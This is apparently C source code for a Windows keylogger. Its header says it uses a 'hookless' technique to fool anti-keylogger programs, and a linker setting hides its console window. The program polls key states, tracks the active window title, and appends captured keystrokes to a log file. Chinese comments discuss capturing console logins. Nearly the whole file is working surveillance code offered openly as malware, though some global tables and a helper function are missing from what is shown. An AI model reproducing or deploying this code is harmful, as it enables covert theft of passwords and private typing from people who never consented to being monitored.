//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: Hookless Keylogger
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
// Limitation: More Usage Of System Resource; May Not Work On Win9x
// Advantage: Hookless Technique Fools Anti-Keylogger Programs
//**********************************************************************
//问题:只能抓控制台登录,无法抓取3389登录用户的键盘记录:
#include <windows.h>
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) //隐藏CMD 窗口
// Some Global Variables
// Function ProtoType Declaration
//----------------------------------------------------------------------
BOOL IsWindowsFocusChange();
BOOL KeyLogger1();
HANDLE InitLogFile(void);
//----------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
// Main Function
int main()
{
KeyLogger1(); // Run The Keylogger
return 0; // The Program Quit
}
// End Of Main
//-------------------------------------------------------------------------
// Purpose: To Check The Active Windows Title
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL IsWindowsFocusChange()
{
HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's Focus
BOOL ReturnFlag = FALSE; // Declare The Return Flag
if (hFocus != PreviousFocus) // The Active Windows Has Change
{
PreviousFocus = hFocus; // Save The Old Active Windos Focus
int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The Caption
GetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows's Caption
if (strlen(WindowCaption) > 0) // Really Get The Windows's Caption
{
printf("\r\nThe Active Windows Title: %s\r\n",WindowCaption); // Display The Active Windows's Caption
ReturnFlag=TRUE; // Indicate The Windows's Focus Has Changed
}
free(WindowCaption); // Free The Allocated Memory
}
return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function
//-------------------------------------------------------------------------
// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL KeyLogger1()
{
int bKstate[256] = {0}; // Declare The Key State Array
int i,x;
char KeyBuffer[600]; // Key Buffer Array
int state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
int shift; // Variable To Hode State Of Shift Key
DWORD dwWritten = 0;
//将键盘记录写入日志文件
HANDLE hFile = InitLogFile();
// Reset The Buffer
memset(KeyBuffer,0,sizeof(KeyBuffer));
//下面是切换用户桌面操作:
GetDesktopWindow();
if (hInputDesk == NULL)
{
return TRUE;
}
BOOL bRet = SetThreadDesktop( hInputDesk);
CloseDesktop( hInputDesk );
while(TRUE) // Forever Loop Is Taking Place Here
{
Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UP
if (IsWindowsFocusChange()) //Check The Active Windows Title
{
if (strlen(KeyBuffer) != 0) // Keys Are Pressed
{
sprintf(KeyBuffer,"%s\r\n",KeyBuffer); // Display The Keys Pressed
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, KeyBuffer, (DWORD)strlen(KeyBuffer), &dwWritten, NULL);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer
}
}
for(i=0;i<92;i++) // Looping To Check Visual Keys
{
shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
x = SpecialKeys[ i ]; // Match The Key
if (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys
{
// See Whether CapsLocak Or Shift Is Pressed
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1; //Uppercase Characters A-Z
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2; //Lowercase a-z
}
else
if (shift < 0) // Shift Is Pressed
{
bKstate[x] = 3; //Uppercase Characters A-Z
}
else
bKstate[x] = 4; //Lowercase a-z
}
else
{
if (bKstate[x] != 0) // No Combination Keys Detected
{
state = bKstate[x]; // Retrieve The Current State
bKstate[x] = 0; // Reset The Current State
if (x == 8) // Back Space Is Detected
{
KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
continue; // Start A New Loop
}
else
if (strlen(KeyBuffer) > 550) // Buffer FULL
{
sprintf(KeyBuffer,"%s\r\n",KeyBuffer); // Display The Keys Retrieved
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, KeyBuffer, (DWORD)strlen(KeyBuffer), &dwWritten, NULL);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffer
continue; // Start A New Loop
}
else
if (x == 13) // Enter Is Detected
{
if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
{
continue; // Start A New Loop
}
sprintf(KeyBuffer,"%s\r\n",KeyBuffer); // Retrieve Other Keys With Enter
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, KeyBuffer, (DWORD)strlen(KeyBuffer), &dwWritten, NULL);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Enter
continue; // Start A New Loop
}
else
if ((state%2) == 1) //Must Be Upper Case Characters
{
strcat(KeyBuffer,UpperCase[ i ]); // Store The Key To Key Buffer
}
else
if ((state%2) == 0) // Must Be Lower Case Characters
{
strcat(KeyBuffer,LowerCase[ i ]); // Store The Key To Key Buffer
}
}
}
}// End Of For Loop
}// End Of While Loop
return TRUE; // Return To The Caller
}// End Of KeyLogger Function
